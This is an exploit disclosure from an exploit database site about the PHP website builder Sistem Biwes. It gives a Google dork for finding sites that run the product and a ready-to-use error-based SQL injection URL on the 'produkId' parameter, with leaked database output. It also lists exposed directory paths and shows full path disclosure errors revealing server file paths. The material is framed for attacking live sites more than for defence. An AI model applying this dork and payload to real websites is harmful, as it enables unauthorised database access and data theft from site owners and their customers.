[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Sistem Biwes Multiple Vulnerability

Author
eidelweiss
Risk
[
Security Risk Critical
]
0day-ID
0day-ID-19287
Category
web applications
Date add
30-08-2012
Platform
php
===================================================================
		Sistem Biwes Multiple Vulnerability
===================================================================
Google Dork: "Powered by sistembiwes.com"
Author: eidelweiss (@randyarios)
Product / software: SISTEM BIWES
Vendor Site: http://sistembiwes.com/
Product Price: RM240 / year

===================================================================
Gratz: Devilzc0de and you!!!
===================================================================
 
Product Description:
 
Sistem Bina Website Sendiri(Biwes)
Sistem Bina Website Sendiri atau lebih dikenali dengan nama Sistem Biwes adalah sistem bina website sendiri berkonsepkan DIY(Do It Yourself).
Ia memberi peluang kepada mereka yang ingin mengendalikan website sendiri tetapi tidak mempunyai pengetahuan tentang website.

Cara penggunaannya iaitu anda masukkan kandungan website, sistem secara automatik akan mencipta menu bagi page baru.
Bagi website e-commerce pula sistem ini digabungkan dengan sistem shopping cart dan sistem pembayaran.

Sistem ini sesuai untuk produk digital ataupun fizikal. Bilangan produk yang sedikit ataupun bilangan produk yang banyak

===================================================================

Vulnerability:
Due to improper input sanitation, parameters are prone to SQL injection, Dir Listing
and Full Path Disclosure Vulnerability.

===================================================================

p0c 1: SQL Injection
Page: index.php
Vulnerable param: 'produkId'
http://host/index.php?c=[valid num]&a=cartM2&produkId=[inject here]	// Use MySQL error based injection
http://host/index.php?c=12&a=cartM2&produkId=(1)and(select%201%20from(select%20count(*),concat(version(),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)--

Duplicate entry '5.1.63-cll1' for key 'group_key'


p0c 2: Dir Listing
path:
- /webs/cartM2/include/
- /webs/cartM2/library/
- /webs/cartM2/images/
- etc


p0c 3: Full Path Disclosure (FPD)
path: multiple
page: multiple


Demo:
http://host/webs/admin/index.php

Warning: require_once(form_login.php) [function.require-once]: failed to open stream: No such file or directory in /home/[TARGET]/public_html/webs/admin/index.php on line 21

Fatal error: require_once() [function.require]: Failed opening required 'form_login.php' (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/[TARGET]/public_html/webs/admin/index.php on line 21


http://host/webs/cartM2/library/database.php

Warning: mysql_query() [function.mysql-query]: Access denied for user '[TARGET]'@'localhost' (using password: NO) in /home/[TARGET]/public_html/webs/cartM2/library/database.php on line 9

Warning: mysql_query() [function.mysql-query]: A link to the server could not be established in /home/[TARGET]/public_html/webs/cartM2/library/database.php on line 9
Access denied for user '[TARGET]'@'localhost' (using password: NO)

etc.. etc.. 

====================================================================
   
			Respect To Be Respected
   
===================================================================
   
==========================| -=[ E0F ]=- |==========================



#  0day.today [2024-12-25]  #